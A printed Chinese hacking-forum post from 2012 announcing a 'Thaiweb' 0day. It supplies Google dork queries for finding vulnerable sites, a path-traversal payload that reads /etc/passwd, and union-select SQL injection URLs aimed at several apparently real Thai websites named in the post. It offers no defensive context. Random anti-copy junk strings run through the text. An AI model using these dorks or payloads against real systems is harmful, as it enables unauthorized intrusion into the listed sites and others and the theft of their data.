中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]

作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:! H2 h7 \) m3 ^& }  K

5 P9 [- V' s& [/ j8 Aintext:powered by Thaiweb
! d- D4 s1 Z, l8 @8 L) g* b/ M* P4 F% e/ g$ n& u2 K7 p
inurl:index.php?page=board.php
2 G! w$ `) ~4 d1 L6 M  p: [/ c; n6 v/ r# v
+ t( S: P& m$ G: g/ e( C: W* r; h
4 w% F9 m9 H) b& [
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd; K! A* R0 O& n, A
( P6 T& \) Y! F$ C: e  }

; q* ?8 Z6 \. m& h5 k
- ]8 R; {8 A3 F2 n: {利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4') G" K! t! G( p5 I3 o: S7 [
' {6 r! ]! X3 h' R% k! m3 r

8 J  v9 A, _/ a  S, K* _2 Q
: L, _! J! F4 ?9 S: [1 R% ?: @http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--+ f% y+ [7 n2 X6 {+ m
4 p0 `" f) B# }5 _4 t' M
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ @& Q( p5 e( [; X3 N) l1 P0 V
. _/ V5 o( N  [3 J6 Xhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ q  |9 `8 a+ A1 H





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2